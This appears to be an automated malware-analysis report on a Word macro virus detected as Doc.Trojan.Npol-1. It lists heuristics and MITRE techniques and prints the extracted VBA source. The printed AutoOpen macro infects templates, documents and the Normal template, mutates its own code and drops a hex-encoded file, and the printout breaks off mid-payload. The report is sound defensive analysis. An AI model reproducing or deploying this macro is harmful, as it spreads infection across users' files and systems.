Verdict: MALICIOUS
Risk Score: 308
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Word document containing a VBA macro that executes when the document is opened (AutoOpen). The macro attempts to copy itself into other Word templates and documents found in the user's directories, indicating self-spreading, worm-like behavior. It also attempts to copy itself into documents in the user's recent-documents folder, potentially to facilitate further infection or persistence.
Heuristics (7)
- ClamAV: Doc.Trojan.Npol-1 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Trojan.Npol-1
- VBA macros detected [medium, OLE_VBA_MACROS, 4 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Environ() call (env variable access) [low, OLE_VBA_ENVIRON]: Environ() call (env variable access)
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 65440 bytes |

SHA-256: 2497af07ec85e9dcb6ed5f3451631c42334ac2f8eafe725da026059a967355f5
Detection: ClamAV: Doc.Trojan.Npol-1
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "FF"
Private Sub AutoOpen()
On Error Resume Next
Randomize (Timer)
SpreadDir = Application.Path & "\"
Victim = Dir(SpreadDir & "\*.dot")
Application.OrganizerCopy ThisDocument.FullName, "C:\Test.dat", "FF", wdOrganizerObjectProjectItems
Do Until Victim = ""
SetAttr SpreadDir & Victim, vbNormal
Application.OrganizerCopy ThisDocument.FullName, SpreadDir & Victim, "FF", wdOrganizerObjectProjectItems
Victim = Dir
Loop
Application.OrganizerCopy ThisDocument.FullName, SpreadDir & "\*.doc", "FF", wdOrganizerObjectProjectItems
SpreadDir = Environ("WINDIR") & "\Recent"
Chk = Dir(recent & "\*.doc")
If Chk = True Then Application.OrganizerCopy ThisDocument.FullName, SpreadDir & "\*.doc", "FF", wdOrganizerObjectProjectItems
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(i).Name = "FF" Then GoTo AlreadyDone
Next i
Application.OrganizerCopy ActiveDocument.FullName, NormalTemplate.FullName, "FF", wdOrganizerObjectProjectItems
AlreadyDone:
If Int(Rnd * 24) > Hour(Time) Then
MorphFactor = Int(Rnd * 10)
Select Case MorphFactor
Case 1
Fake = Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & " = " & CStr(Int(Rnd * 999999999))
Case 2
Fake = Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & " = " & Chr(58) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(58)
Case 3
Fake = "DoEvents"
Case 4
Fake = "'" & Application.UserName & Application.UserAddress & Application.ActivePrinter
Case 5
JumpPoint = Chr(Int(Rnd * 5) + 65) & Hex(CStr(Oct(MorphFactor ^ 4) & CStr(Day(Date)) & CStr(Minute(Time)) & CStr(Hour(Time))))
Fake = "Goto " & JumpPoint & Chr(13) & JumpPoint & ":"
Case 6
Fake = Chr(13)
Case 7
Fake = "For " & Chr(MorphFactor + 65) & " = 1 To 1" & Chr(13) & "Next " & Chr(MorphFactor + 65)
Case 8
Fake = "Rem"
Case 9
Fake = "If " & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & " = " & CStr(Int(Rnd * 45)) & "Then " & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & " = " & CStr(Int(Rnd * 45))
Case 10
Fake = "Do" & Chr(13) & "Exit Do" & Chr(13) & "Loop"
End Select
'ThisDocument.VBProject.VBComponents("FF").CodeModule.InsertLines Int(Rnd * ThisDocument.VBProject.VBComponents("FF").CodeModule.CountOfLines - 3) + 1, Fake
End If
Open Environ("WINDIR") & "\System\Bio.tmp" For Output As #1
Print #1, "N " & Environ("WINDIR") & "\System\" & "BIO.JPG"
Print #1, "E 0100 FF D8 FF E0 00 10 4A 46 49 46 00 01 01 00 00 01 "
Print #1, "E 0110 00 01 00 00 FF DB 00 43 00 35 25 28 2F 28 21 35 "
Print #1, "E 0120 2F 2B 2F 3C 39 35 3F 50 85 57 50 49 49 50 A3 75 "
Print #1, "E 0130 7B 61 85 C1 AA CB C8 BE AA BA B7 D5 F0 FF FF D5 "
Print #1, "E 0140 E2 FF E6 B7 BA FF FF FF FF FF FF FF FF FF CE FF "
Print #1, "E 0150 FF FF FF FF FF FF FF FF FF FF DB 00 43 01 39 3C "
Print #1, "E 0160 3C 50 46 50 9D 57 57 9D FF DC BA DC FF FF FF FF "
Print #1, "E 0170 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF "
Print #1, "E 0180 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF "
Print #1, "E 0190 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF C0 "
Print #1, "E 01A0 00 11 08 00 DB 01 33 03 01 22 00 02 11 01 03 11 "
Print #1, "E 01B0 01 FF C4 00 1F 00 00 01 05 01 01 01 01 01 01 00 "
Print #1, "E 01C0 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 "
Print #1, "E 01D0 0A 0B FF C4 00 B5
... (truncated)